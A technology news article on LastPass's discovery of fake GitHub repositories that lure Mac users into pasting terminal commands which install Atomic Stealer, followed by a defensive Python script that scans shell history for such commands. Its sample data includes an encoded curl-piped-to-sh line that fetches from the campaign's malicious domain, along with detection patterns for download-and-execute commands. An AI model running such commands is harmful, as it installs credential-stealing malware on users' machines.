LastPass uncovers fake GitHub repos spreading Atomic Stealer malware to Mac users


Mac users have a new reason to be cautious when downloading software. LastPass has revealed that cybercriminals are running a large-scale campaign using fraudulent GitHub repositories to trick people into installing the Atomic Stealer (AMOS) malware.

The LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team discovered the effort, which uses aggressive Search Engine Optimization (SEO) tactics to push malicious links to the top of Google and Bing results. The attackers create GitHub pages impersonating companies such as LastPass, 1Password, Citibank, Fidelity, Docker, Dropbox, Shopify, and dozens more. When a victim clicks through, the repository pages redirect to malicious websites that instruct them to paste commands into the macOS Terminal. Those commands eventually pull down the Atomic Stealer payload.

LastPass says it immediately reported and helped take down multiple GitHub pages targeting its own customers. One example involved a repository that pretended to offer "Install LastPass on MacBook." It funneled users through a series of redirects until they unknowingly executed an encoded curl command that decoded into a malicious download from bonoud[.]com. That file planted the infostealer under the guise of an "Update" process.

Atomic Stealer is not new. It has been circulating since at least April 2023 and is associated with financially motivated groups that focus on harvesting passwords, crypto wallet keys, and other sensitive information. This latest campaign simply repackages an old threat in a new delivery method, using GitHub’s trusted reputation and search visibility to ensnare victims.

The list of impersonated brands is long. Beyond password managers and financial firms, the attackers set up GitHub repos imitating software projects like Audacity, Thunderbird, Docker, Notion, Obsidian, and even Adobe's After Effects. This indicates a broad, opportunistic approach rather than a focus on any single brand or sector.

LastPass has shared a full set of Indicators of Compromise (IoCs) to help defenders identify infections and related infrastructure. Security teams can use these to block the known domains and file hashes linked to the campaign and to hunt for them in logs and on endpoints. The company is continuing to monitor the operation and warns that the same actors may quickly create new repositories after takedowns, so the IoC list should be treated as a starting point rather than a complete blocklist.
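The delivery chain described above (a pasted terminal command that downloads, decodes, and runs a payload) and the IoC list LastPass published can both be checked against a Mac's shell history. The script below is an added example, not code from this article or from LastPass. It parses zsh history lines, flags downloader-to-shell pipes and base64-decoded strings that hide a URL, and matches every host it can extract against an IoC set. The only IoC it carries is bonoud[.]com, the one domain the article names; the `IOC_DOMAINS` set, the `example.test` host, and the sample history lines are constructed for the example.

```python
import base64
import binascii
import re
from typing import Dict, List
from urllib.parse import urlparse

# IoC domains to match. "bonoud.com" is the one domain named in the article (defanged there as
# bonoud[.]com). The rest of LastPass's published IoC list is not reproduced here; extend this set.
IOC_DOMAINS = {"bonoud.com"}

# Patterns for the delivery chain the article describes: a downloader piped straight into a shell,
# and base64 blobs decoded at runtime to hide the real download URL.
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:sh|bash|zsh)\b")
B64_DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL = re.compile(r"https?://[^\s\"')|]+")

# Constructed sample in zsh EXTENDED_HISTORY format (": <timestamp>:<duration>;<command>").
# Only the bonoud.com host comes from the article; the other hosts and commands are made up.
ENCODED_IOC_URL = base64.b64encode(b"https://bonoud.com/").decode()
SAMPLE_HISTORY = "\n".join([
    ": 1700000000:0;ls -la",
    ": 1700000001:0;curl -fsSL https://example.test/install.sh | bash",
    f': 1700000002:0;curl -s "$(echo {ENCODED_IOC_URL} | base64 -d)" | sh',
    ": 1700000003:0;git clone https://github.com/example/repo",
    ": 1700000004:0;brew install audacity",
])


def parse_history_line(line: str) -> str:
    """Strip the zsh EXTENDED_HISTORY prefix ': <timestamp>:<duration>;' if present."""
    m = re.match(r"^:\s*\d+:\d+;(.*)$", line)
    return m.group(1) if m else line


def decode_b64_tokens(cmd: str) -> List[str]:
    """Return printable UTF-8 decodings of base64-looking tokens in the command."""
    out = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # random URL paths and hashes usually fail here
        if text.isprintable():
            out.append(text)
    return out


def hosts_in(text: str) -> List[str]:
    """Hostnames of every http(s) URL found in the text."""
    return [h for h in (urlparse(u).hostname for u in URL.findall(text)) if h]


def analyze_command(cmd: str) -> Dict:
    """Score one shell command; 'reasons' is empty when nothing looks suspicious."""
    reasons = []
    decoded = decode_b64_tokens(cmd)
    hosts = set(hosts_in(cmd))
    for text in decoded:
        hosts.update(hosts_in(text))
    if DOWNLOADER.search(cmd) and PIPE_TO_SHELL.search(cmd):
        reasons.append("remote content piped to shell")
    if B64_DECODE.search(cmd):
        reasons.append("base64 decode used in command")
    decoded_hosts = sorted({h for t in decoded for h in hosts_in(t)})
    if decoded_hosts:
        reasons.append("URL hidden in base64: " + ", ".join(decoded_hosts))
    hits = sorted(h for h in hosts
                  if any(h == d or h.endswith("." + d) for d in IOC_DOMAINS))
    if hits:
        reasons.append("IoC domain match: " + ", ".join(hits))
    return {"command": cmd, "hosts": sorted(hosts), "decoded": decoded, "reasons": reasons}


def scan_history(history_text: str) -> List[Dict]:
    """Return the analysis of every history line that triggered at least one reason."""
    findings = []
    for line in history_text.splitlines():
        cmd = parse_history_line(line).strip()
        if cmd:
            result = analyze_command(cmd)
            if result["reasons"]:
                findings.append(result)
    return findings


def scan_file(path: str) -> List[Dict]:
    """Scan a real history file; zsh stores non-ASCII input 'metafied', so decode leniently."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_history(fh.read())


if __name__ == "__main__":
    for finding in scan_history(SAMPLE_HISTORY):
        print(finding["command"])
        for reason in finding["reasons"]:
            print("   ", reason)
```

Run it as `python3 scan_history.py` to see the two flagged sample lines, or call `scan_file("~/.zsh_history")` (after expanding the path) on a machine under investigation. Interactive history is only one artifact: a victim who pasted the command into a script or a non-zsh shell leaves no trace here, so pair this with the published IoC domains and hashes in DNS logs and EDR telemetry.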

For everyday users, the advice is simple but critical: do not install software from random GitHub pages or unfamiliar websites, even if they appear high in search results, and never paste a terminal command from a web page you do not fully trust. Download only from official company sites or trusted app stores.

LastPass stresses that protecting users is its top priority and says it will keep collaborating with industry partners to disrupt the attackers. But at the end of the day, personal vigilance remains the best defense.

Author

  • Brian Fagioli, journalist at NERDS.xyz

    Brian Fagioli is a technology journalist and founder of NERDS.xyz. Known for covering Linux, open source software, AI, and cybersecurity, he delivers no-nonsense tech news for real nerds.
